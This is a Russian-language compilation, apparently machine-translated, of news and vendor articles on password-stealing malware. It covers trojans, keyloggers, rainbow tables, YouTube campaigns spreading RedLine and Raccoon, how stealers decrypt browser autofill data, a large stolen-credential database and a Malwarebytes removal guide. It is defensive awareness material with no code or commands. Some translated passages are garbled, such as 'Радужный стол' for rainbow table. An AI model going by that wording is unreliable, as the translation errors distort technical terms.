Кандия сообщила, что F-Secure обнаружила вирус в среду вечером, когда поставщику безопасности позвонил зараженный пользователь из Норвегии. F-Secure подозревает, что вирус возник на Филиппинах, потому что автор программы «Троянский конь» включил в программное обеспечение сообщение «Copyright 2000, GRAMMERSoft Group, Manila, Phil.»
Но хотя все признаки указывают на злоумышленника из Филиппин, автор вируса может попытаться замаскировать свою личность, отметила Кандия.
«Это может быть кто-то из Нью-Йорка, у которого может быть учетная запись филиппинского интернет-провайдера», — согласился Леви. «Он мог сидеть в Бронксе в шортах и смеяться».
Copyright © 2000 IDG Communications, Inc.
Как хакеры крадут пароли?
Как поставщик управляемых услуг (MSP), защита себя и своих клиентов от парольных атак — серьезный бизнес.Кража паролей злоумышленник может получить доступ к совершенно секретным данным, доступ к банковским счетам или перепродать информацию о паролях другим злоумышленникам. Поскольку пароли являются ключом к такому количеству важной информации, защита паролей от злоумышленников имеет решающее значение для любого современного бизнеса.
Насколько безопасен ваш пароль?Существует множество различных способов взлома паролей ваших клиентов, и поставщики услуг должны не допустить, чтобы злоумышленник взломал пароли ваших клиентов.Чтобы предотвратить доступ злонамеренных компьютерных хакеров к вашей системе, вы должны сначала понять, как может выглядеть парольная атака. Вот некоторые из наиболее распространенных методов, используемых злоумышленниками для кражи паролей.
1. Троянский конь
Программное обеспечение со злым умыслом называется вредоносным ПО. Вредоносное ПО часто попадает в вашу систему через случайную загрузку с подозрительных веб-сайтов, на которых размещены всплывающие окна, или через ссылки для «бесплатной загрузки».
При атаке троянского коня злоумышленник маскирует вредоносное ПО под законное программное обеспечение или безобидную ссылку, возможно, с помощью вводящего в заблуждение электронного письма, поддельного веб-сайта или поддельной рекламы.Затем загруженное вредоносное ПО предоставляет злоумышленнику доступ к данным вашего пароля, а также к другим данным, хранящимся на вашем устройстве.
Чтобы предотвратить появление троянских коней, открывайте ссылки в сообщениях электронной почты и посещайте новые веб-страницы с осторожностью. Чтобы автоматически блокировать троянских коней до того, как они нанесут ущерб, организациям следует установить брандмауэры и обеспечить шифрование всех важных данных.
2. Кейлоггер
Атака с помощью кейлоггера — это тип атаки вредоносного ПО, специально разработанный для доступа к данным пароля.Кейлоггеры работают с использованием довольно простого набора правил: программное обеспечение для кейлоггеров регистрирует ваши нажатия клавиш, как только вы включаете компьютер, что позволяет злоумышленникам получить доступ к паролям — независимо от того, насколько сложными могут быть ваши пароли.
Для предотвращения доступа кейлоггеров к системе требуются многие из тех же основных мер предосторожности, что и при любой другой атаке вредоносного ПО. MSP должны обучать технических специалистов и клиентов, чтобы они не открывали подозрительные ссылки. В некоторых случаях также может быть стоит инвестировать в программное обеспечение для шифрования нажатия клавиш.Другой вариант — использовать службу автозаполнения зашифрованных паролей, которая позволяет вводить данные паролей в раскрывающемся списке, не вводя пароли на клавиатуре.
3. Радужный стол
Радужные таблицы направлены на обратное шифрование паролей. Шифрование паролей — распространенный способ предотвратить доступ через вредоносное ПО и другие распространенные стратегии взлома. Наиболее распространенный способ шифрования паролей — хеширование, это односторонний процесс шифрования, не имеющий единой формулы для обратного преобразования зашифрованных данных.Радужные таблицы — это обширные инструменты, которые запускают множество потенциальных комбинаций хеширования для расшифровки хешированных данных. Радужный стол требует большой сложности, но многие продвинутые кибератаки знают, как ими пользоваться.
Чтобы предотвратить атаку на радужную таблицу, вы можете «засолить» свой хеш, используя функцию, которая добавляет случайные символы в ваши зашифрованные данные, чтобы бросить хакеров в замешательство.
4. Сторонние
Атака третьей стороны или атака цепочки поставок — это когда хакер получает доступ к вашей системе через внешнего партнера, поставщика или поставщика, имеющего доступ к вашим данным.Поскольку MSP часто владеют ключом ко многим системам своих клиентов, они являются потенциальной целью получить доступ сразу к нескольким организациям.
Поскольку сторонние атаки изначально происходят за пределами вашей системы, программному обеспечению защиты паролем труднее обнаружить атаку. Лучший способ предотвратить атаки третьих лиц — использовать безопасный и надежный менеджер паролей, который поможет гарантировать, что злоумышленники не смогут сбежать с вашим главным хранилищем. Сторонние атаки могут иметь разрушительные последствия не только в виде немедленно скомпрометированных данных, но и из-за потери доверия и лояльности клиентов.
5. Брутфорс
Атака паролем методом подбора пароля — это, по сути, игра в угадывание. Атаки методом грубой силы требуют от хакеров запуска огромного количества комбинаций символов, пока они, наконец, не угадают правильный код. С помощью программного обеспечения злоумышленники могут за короткий период времени создать невообразимое количество результатов. Чтобы свести к минимуму вероятность успеха в случае атаки методом перебора, подумайте об использовании парольных фраз, а не паролей.
Лучшие методы защиты паролем в ИнтернетеДля MSP знание того, как предотвратить парольную атаку, является важной частью предоставления эффективных ИТ-услуг. Если MSP позволил кибератакам проскользнуть сквозь бреши, они могут быстро заработать репутацию неквалифицированных или ненадежных. С другой стороны, MSP, которые знают, как помочь предотвратить внешние атаки, могут легче поддерживать позитивные отношения с клиентами.
Чтобы быть на шаг впереди кибератак, надежный инструмент управления паролями может иметь большое значение.SolarWinds ® Passportal помогает генерировать надежные пароли, чтобы помочь предотвратить атаки методом перебора, зашифровать данные для защиты от вредоносных программ и быстро сбросить пароли, чтобы уменьшить ущерб, если хакеры все же получат доступ.
Дополнительное чтение
SolarWinds ® добавляет пакет Passportal в свой портфель продуктов MSP. Безопасность MSP, упрощенная. SolarWinds ® Passportal + Documentation Manager — это платформа, сертифицированная по стандарту SOC 2, протестированная на RAPID 7 и отмеченная наградами.
Развивайте свой бизнес быстрее с помощью первой в мире унифицированной платформы для полноценного управления паролями и безопасной ИТ-документации. Более 2000 лучших в своем классе MSP по всему миру используют нашу безопасность, автоматизацию и быстрый доступ к своим знаниям о клиентах, чтобы превзойти конкурентов.
КампанияMassive использует YouTube для распространения вредоносного ПО для кражи паролей
Широко распространенные вредоносные кампании создают видеоролики на YouTube для распространения троянских программ, ворующих пароли, среди ничего не подозревающих зрителей.
Трояны для кражи паролей — это вредоносные программы, которые незаметно запускаются на компьютере во время кражи паролей, снимков экрана активных окон, файлов cookie, кредитных карт, хранящихся в браузерах, учетных данных FTP и произвольных файлов, выбранных злоумышленниками.
После установки вредоносная программа будет взаимодействовать с сервером Command & Control, где она ожидает выполнения команд злоумышленником, что может повлечь за собой запуск дополнительных вредоносных программ.
Вредоносные видео на YouTube стали безумными
Злоумышленники уже давно используют видеоролики YouTube как способ распространения вредоносного ПО через встроенные ссылки в описаниях видео.
Однако на этой неделе исследователь безопасности Cluster25 Фрост сообщил BleepingComputer, что на YouTube наблюдается значительный рост вредоносных кампаний, распространяющих различные троянские программы для кражи паролей.
Frost сообщил BleepingComputer, что, вероятно, одновременно осуществляются два кластера вредоносной активности: один запускает вредоносную программу RedLine, а другой — Racoon Stealer.
Исследователь сказал, что в рамках этой масштабной кампании по борьбе с вредоносным ПО были созданы тысячи видео и каналов: всего за двадцать минут было создано 100 новых видео и 81 канал.
Frost объяснил, что злоумышленники используют украденные учетные записи Google для запуска новых каналов YouTube для распространения вредоносных программ, создавая бесконечный и постоянно растущий цикл.
«У злоумышленников есть тысячи новых каналов, потому что они заражают новых клиентов каждый день. В рамках этих атак они крадут учетные данные жертвы в Google, которые затем используются для создания новых видеороликов YouTube для распространения вредоносного ПО», — сказал Фрост BleepingComputer.
Атаки начинаются с того, что злоумышленники создают многочисленные каналы YouTube с видеороликами о взломах программного обеспечения, лицензиях, практических руководствах, криптовалюте, майнинге, читах в играх, программном обеспечении VPN и почти любой другой популярной категории.
Пример вредоносного YouTube-каналаЭти видео содержат материалы, объясняющие, как выполнить задачу с помощью определенной программы или служебной программы. Кроме того, описание видео на YouTube включает предполагаемую ссылку на связанный инструмент, используемый для распространения вредоносного ПО.
Вредоносное видео на YouTube, выталкивающее RedLine StealerЕсли видео содержит ссылку bit.ly, оно приведет к другому файлообменному сайту, на котором размещена вредоносная программа RedLine для похищения паролей.Однако, если он включает в себя не укороченный домен, он будет перенаправлять на страницу в домене taplink [.] Cc, чтобы протолкнуть Racoon Stealer, как показано ниже.
Целевая страница Racoon StealerПосле заражения пользователя вредоносная программа просканирует все установленные браузеры и компьютер на предмет наличия криптовалютных кошельков, кредитных карт, паролей и других данных и загрузит их обратно злоумышленнику.
Google сообщил BleepingComputer, что они осведомлены о кампании и принимают меры, чтобы помешать ей.
«Нам известно об этой кампании, и в настоящее время мы принимаем меры, чтобы заблокировать активность этого злоумышленника и пометить все ссылки на безопасный просмотр. Как всегда, мы постоянно совершенствуем наши методы обнаружения и инвестируем в новые инструменты и функции, которые автоматически определяют и останавливают угрозы, подобные этой. Также важно, чтобы пользователи знали об этих типах угроз и принимали соответствующие меры для дальнейшей защиты ». — Google.
Google также раскрыл на этой неделе фишинговую кампанию, в ходе которой распространялись троянские программы для кражи паролей, используемые для кражи аккаунтов авторов YouTube.Затем эти учетные записи продавались на рынках даркнета или использовались для мошенничества с криптовалютой.
Загрузка программного обеспечения может быть опасной
Эти кампании показывают, насколько важно не скачивать программы из Интернета наугад, поскольку такие сайты, как YouTube, не могут проверять каждую ссылку, добавленную издателями видео.
Следовательно, пользователь должен изучить сайт перед загрузкой и установкой чего-либо с него, чтобы определить, имеет ли он хорошую репутацию и ему можно доверять.Даже в этом случае всегда рекомендуется сначала загрузить программу на такой сайт, как VirusTotal, чтобы убедиться, что запускать ее безопасно.
Если вы случайно подверглись этой атаке и установили программу по аналогичной ссылке, настоятельно рекомендуется просканировать компьютер с помощью антивирусной программы.
После того, как вы удалили все вредоносные программы, обнаруженные при сканировании на вирусы, вам следует немедленно изменить все пароли, сохраненные в ваших браузерах.
Обновление 21.10.21, 19:28 EST: добавлено заявление от Google.
Как вирусы крадут данные автозаполнения из браузеров
Большинство браузеров предлагают сохранить ваши данные: учетные данные, данные банковской карты для интернет-магазинов, платежный адрес, имя и номер паспорта для сайтов путешествий и т. Д. Это удобно и избавляет от необходимости заполнять одни и те же формы заново или беспокоиться о забытых паролях. Однако есть одна загвоздка: все эти данные автозаполнения могут быть собраны киберпреступниками, если ваш компьютер заражен стилером — вредоносной программой, которая крадет информацию, в том числе из браузеров.
Такие программы становятся все более популярными среди интернет-мошенников: только за первое полугодие этого года защитные продукты «Лаборатории Касперского» обнаружили более 940 000 стилеров. Это на треть больше, чем за аналогичный период 2018 года.
Строго говоря, стилеров интересуют не только данные автозаполнения браузеров — они также ищут кошельки с криптовалютой и игровые данные, а также воруют файлы с настольных компьютеров (мы надеемся, что вы не храните там ценную информацию, такую как списки паролей).
Однако браузеры стали центром работы и развлечений, включая покупки, банковское дело и многое другое, и часто являются источником гораздо более конфиденциальной информации, чем другие программы. Давайте посмотрим, как воры получают данные браузера.
Как браузеры хранят ваши данные автозаполнения
Разработчики браузеров стремятся защитить доверенную им информацию. Для этого они шифруют его, и расшифровка возможна только на том же устройстве и из той же учетной записи, которая его сохранила.Поэтому, если кто-то просто украдет файл с данными автозаполнения, он не сможет его использовать — все в нем надежно зашифровано.
Но есть одно но. По умолчанию разработчики браузера предполагают, что ваше устройство и учетная запись хорошо защищены, а это означает, что любая программа, запущенная из вашей учетной записи на вашем компьютере, действует от вашего имени и, следовательно, должна иметь возможность извлекать и расшифровывать сохраненные данные. К сожалению, это также относится к вредоносным программам, которые проникли на устройство и работают под вашей учетной записью.
Единственным браузером, который предлагает дополнительную защиту сохраненных данных от третьих лиц, является Firefox, который позволяет вам создать мастер-пароль, который вы должны вводить, когда вам нужно, чтобы данные были расшифрованы и использованы для автозаполнения. Однако по умолчанию этот параметр отключен.
Как вредоносное ПО крадет данные из Chrome
Google Chrome и другие браузеры, основанные на движке Chromium (например, Opera и Яндекс.Браузер), всегда хранят пользовательские данные в одном и том же месте, поэтому у стилеров не возникнет проблем с их поиском.По крайней мере теоретически эти данные хранятся в зашифрованном виде. Однако, если вредоносная программа уже проникла в систему, то ее действия совершаются от вашего имени.
Таким образом, вредоносная программа просто отправляет вежливый запрос к инструменту шифрования данных браузера, чтобы расшифровать информацию, хранящуюся на вашем компьютере. Поскольку запросы, казалось бы, исходящие от пользователя, по умолчанию считаются безопасными, в ответ похититель получает все ваши пароли и данные кредитной карты.
Как вредоносное ПО крадет данные из Firefox
Firefox работает немного иначе.Чтобы скрыть базы паролей и многое другое от посторонних, браузер создает профиль со случайным именем, поэтому вредоносная программа не может заранее знать, где его искать. Однако имя файла с сохраненными данными не меняется, поэтому нет ничего, что могло бы помешать стилеру перебрать все профили (папки, содержащие их, хранятся в одном месте) и определить нужный файл.
После этого вредоносная программа снова просит соответствующий модуль браузера расшифровать файлы, и это успешно, поскольку предположительно действует от вашего имени.
Как вредоносное ПО крадет данные из Internet Explorer и Edge
Родные браузеры Windows используют специальное хранилище для ваших данных. Точный метод и тип хранилища зависят от версии приложения, но в любом случае надежность оставляет желать лучшего. Здесь также вредоносная программа может легко получить ваши пароли и данные кредитной карты, запросив их из хранилища, по-видимому, от вашего имени.
Проблема в том, что запрос вредоносной программы на расшифровку данных браузера, по всей видимости, исходит от пользователя, поэтому у браузера нет причин сказать «нет».
Что происходит с данными, украденными стилером?
Как только вредоносная программа получает данные автозаполнения в виде простого текста, она отправляет их злоумышленникам. Оттуда может разворачиваться любой из двух сценариев. Обработчики вредоносного ПО могут использовать его сами или, что более вероятно, продать другим злоумышленникам на черном рынке, где такие продукты всегда высоко ценятся.
В любом случае, если имена пользователей и пароли были среди сохраненной информации, мошенники, скорее всего, украдут несколько ваших учетных записей и попытаются вытащить деньги у ваших друзей.Если вы сохранили данные банковской карты в браузере, потери могут быть более прямыми; ваши деньги будут потрачены или переведены в другое место.
Украденные учетные записи также могут использоваться для многих других целей, от рассылки спама и продвижения веб-сайтов или приложений до рассылки вирусов и отмывания денег, украденных у других (и, если к вам подключится полиция, они могут постучать в вашу дверь).
Как защитить данные от воров
Как видите, если вредоносное ПО проникает на ваш компьютер, данные, хранящиеся в браузере, подвергаются риску, а вместе с ним и ваши финансы и репутация.Чтобы избежать такой ситуации:
- Не доверяйте важную информацию, такую как данные банковской карты, вашему браузеру для безопасного хранения. Вместо этого вводите их каждый раз вручную — это займет больше времени, но безопаснее. Вы также можете хранить пароли в диспетчере паролей.
- Если вы используете Firefox, вы можете защитить сохраненные в браузере данные с помощью мастер-пароля. Для этого щелкните три полосы в правом верхнем углу браузера и выберите Options , перейдите на вкладку Privacy & Security , прокрутите вниз до Logins and Passwords и выберите Use a master password коробка.Браузер попросит вас создать этот пароль — чем длиннее и сложнее, тем сложнее будет взломать его злоумышленникам.
- Самое важное: лучший способ защитить данные — это в первую очередь предотвратить проникновение вредоносных программ на ваш компьютер. Для этого установите надежное решение безопасности, которое предотвратит заражение. Никаких вредоносных программ, никаких проблем!
Может ли вредоносное ПО взломать и украсть вашу учетную запись электронной почты?
Вредоносное ПО — это вредоносное ПО, которое может заразить ваш компьютер и выполнить вредоносные действия без вашего разрешения.Этот термин является довольно широким и охватывает различные угрозы, такие как вирус , троян , шпионское ПО и вымогатель . К сожалению, некоторые типы вредоносных программ действительно могут позволить хакеру получить доступ к вашей учетной записи электронной почты и завладеть ею.
Это чрезвычайно опасно, поскольку открывает ряд возможностей для киберпреступников, от использования вашей электронной почты для рассылки спама до кражи личных данных и попыток выдать себя за вас в мошенничестве.
Самый распространенный способ заражения вредоносным ПО — щелкнуть вредоносную ссылку или файл.Самый распространенный способ связаться с вредоносной ссылкой или файлом — это получать электронные письма и посещать подозрительные веб-сайты.
Это означает, что люди, которые имеют привычку загружать пиратские программы, и те, кто не обращает особого внимания на получаемые электронные письма, с большей вероятностью подвергнутся атаке вредоносного ПО.
Заражение вредоносным ПО также тесно связано с фишингом , и целевым фишингом . Эти мошенничества с электронной почтой происходят, когда хакер выдает себя за бренд, компанию или известное лицо, чтобы часто уговаривать вас щелкнуть ссылку или загрузить файл .
Что еще хуже, если у вас нет антивирусной программы или если программа не обнаруживает угрозу, вы, вероятно, даже не узнаете, что вы заражены.
В зависимости от цели злоумышленника и типа используемого вредоносного ПО, заражение игнорирует , чтобы избежать внимания. После установки вредоносного ПО преступник может получить доступ ко всей вашей машине, включая вашу электронную почту.
После этого ему будет легко использовать вашу электронную почту для других типов кибератак.Просто подумайте о количестве информации, хранящейся в вашей электронной почте или к которой вы можете получить доступ.
С помощью электронной почты вы можете сбрасывать пароли для веб-сайтов, на которых у вас есть учетная запись, например, позволяя хакеру получить контроль над вашими социальными сетями или даже получить доступ к вашим финансовым и банковским данным.
Кроме того, преступник может выдать себя за вас, чтобы заманить и убедить вашу семью, коллег или служащих.
Тайная вредоносная программа крадет 26 миллионов паролей с миллионов компьютеров. Вы пострадали?
Исследователи обнаружили еще один массив конфиденциальных данных, головокружительный 1.База данных объемом 2 ТБ, содержащая учетные данные для входа, файлы cookie браузера, данные автозаполнения и платежную информацию, извлеченную вредоносным ПО, которое еще предстоит идентифицировать.
Всего исследователи из NordLocker заявили в среду, что база данных содержит 26 миллионов учетных данных, 1,1 миллиона уникальных адресов электронной почты, более 2 миллиардов файлов cookie браузера и 6,6 миллиона файлов. В некоторых случаях жертвы сохраняли пароли в текстовых файлах, созданных с помощью приложения «Блокнот».
Тайник также включал более 1 миллиона изображений и более 650 000 Word и.pdf файлы. Кроме того, вредоносная программа сделала снимок экрана после того, как заразила компьютер, и сделала снимок с помощью веб-камеры устройства. Похищенные данные также поступали из приложений для обмена сообщениями, электронной почты, игр и обмена файлами. Данные были извлечены в период с 2018 по 2020 год с более чем 3 миллионов компьютеров.
Быстро развивающийся рынок
Это открытие произошло на фоне эпидемии нарушений безопасности, связанных с программами-вымогателями и другими типами вредоносных программ, поражающих крупные компании. В некоторых случаях, включая майскую атаку программ-вымогателей на Colonial Pipeline, хакеры сначала получали доступ, используя скомпрометированные учетные записи.Многие такие учетные данные доступны для продажи в Интернете.Алон Гал, соучредитель и технический директор охранной фирмы Hudson Rock, сказал, что такие данные часто сначала собираются с помощью вредоносного ПО-кражи, установленного злоумышленником, пытающимся украсть криптовалюту или совершить преступление аналогичного типа.
Злоумышленник «скорее всего, затем попытается украсть криптовалюту, и как только он закончит с информацией, он будет продавать ее группам, специализирующимся на программах-вымогателях, взломе данных и корпоративном шпионаже», — сказал мне Гал.«Эти кражи собирают пароли браузера, файлы cookie, файлы и многое другое и отправляют их на [сервер управления и контроля] злоумышленника».
Реклама ИсследователиNordLocker заявили, что у злоумышленников нет недостатка в источниках для защиты такой информации.
«На самом деле любой может заполучить нестандартное вредоносное ПО», — пишут исследователи. «Это дешево, легко настраивается, и его можно найти по всему Интернету. Реклама этих вирусов в даркнете раскрывает еще больше правды об этом рынке.Например, любой желающий может получить собственное вредоносное ПО и даже уроки по использованию украденных данных всего за 100 долларов. А индивидуальность означает индивидуальность — рекламодатели обещают, что они могут создать вирус для атаки практически на любое приложение, необходимое покупателю ».
NordLocker не смог идентифицировать вредоносное ПО, использованное в этом случае. Гэл сказал, что с 2018 по 2019 год широко используемыми вредоносными программами были Azorult, а в последнее время — программа для кражи информации, известная как Raccoon. После заражения компьютер будет регулярно отправлять украденные данные на сервер управления и контроля, которым управляет злоумышленник.
Всего вредоносная программа собрала учетные данные почти 1 миллиона сайтов, включая Facebook, Twitter, Amazon и Gmail. Из 2 миллиардов извлеченных файлов cookie 22 процента оставались действительными на момент обнаружения. Файлы могут быть полезны для сведения воедино привычек и интересов жертв, и если файлы cookie используются для аутентификации, они предоставляют доступ к онлайн-аккаунтам человека. Здесь NordLocker приводит другие цифры.
Люди, которые хотят определить, были ли их данные захвачены вредоносным ПО, могут проверить службу уведомления о взломе Have I Been Pwned, которая только что загрузила список скомпрометированных учетных записей.
Trojan.PasswordStealer | Malwarebytes Labs | Обнаружения
Краткая биография
Trojan.PasswordStealer — это общее имя Malwarebytes для обнаружения приложений, которые могут работать в фоновом режиме и незаметно собирать информацию о системе, подключенных пользователях и сетевой активности. Trojan.PasswordStealer может попытаться украсть сохраненные учетные данные, имена пользователей и пароли, а также другую личную и конфиденциальную информацию.Эта информация может быть передана по адресу, указанному автором. Trojan.PasswordStealer может позволить злоумышленнику установить дополнительное программное обеспечение на зараженную машину или может заставить зараженную машину участвовать в вредоносной бот-сети с целью рассылки спама или других злонамеренных действий.
Симптомы
Trojan.PasswordStealer может работать незаметно в фоновом режиме и может не сообщать пользователю о заражении.Trojan.PasswordStealer также может отключать антивирусные программы и другие функции безопасности Microsoft Windows.
Тип и источник заражения
Trojan.PasswordStealer может распространяться различными способами. Это программное обеспечение может быть упаковано с бесплатным онлайн-программным обеспечением или может быть замаскировано под безвредную программу и распространяться по электронной почте. Кроме того, это программное обеспечение может быть установлено веб-сайтами, использующими уязвимости программного обеспечения.Инфекции, которые происходят таким образом, обычно проходят бесследно и без ведома или согласия пользователя.
Защита
Malwarebytes защищает пользователей от Trojan.PasswordStealer, используя защиту в реальном времени.
Malwarebytes блокирует Trojan.PasswordStealer
Домашнее восстановление
Malwarebytes может обнаруживать и удалять многие троянские программы.PasswordStealer заражения без дальнейшего взаимодействия с пользователем.
- Загрузите Malwarebytes на свой рабочий стол.
- Дважды щелкните MBSetup.exe и следуйте инструкциям по установке программы.
- Когда установка Malwarebytes для Windows завершится, программа откроется на экране «Добро пожаловать в Malwarebytes».
- Нажмите кнопку Начать работу .
- Щелкните Сканировать , чтобы начать сканирование угроз .
- Щелкните Карантин , чтобы удалить найденные угрозы.
- Перезагрузите систему, если будет предложено завершить процесс удаления.
Восстановление бизнеса
Как удалить Trojan.PasswordStealer с помощью консоли Malwarebytes Nebula
Вы можете использовать консоль Malwarebytes Anti-Malware Nebula для сканирования конечных точек.
Меню задач конечной точки Nebula
Выберите вариант «Сканировать + Карантин».После этого вы можете проверить страницу «Обнаружения», чтобы увидеть, какие угрозы были обнаружены.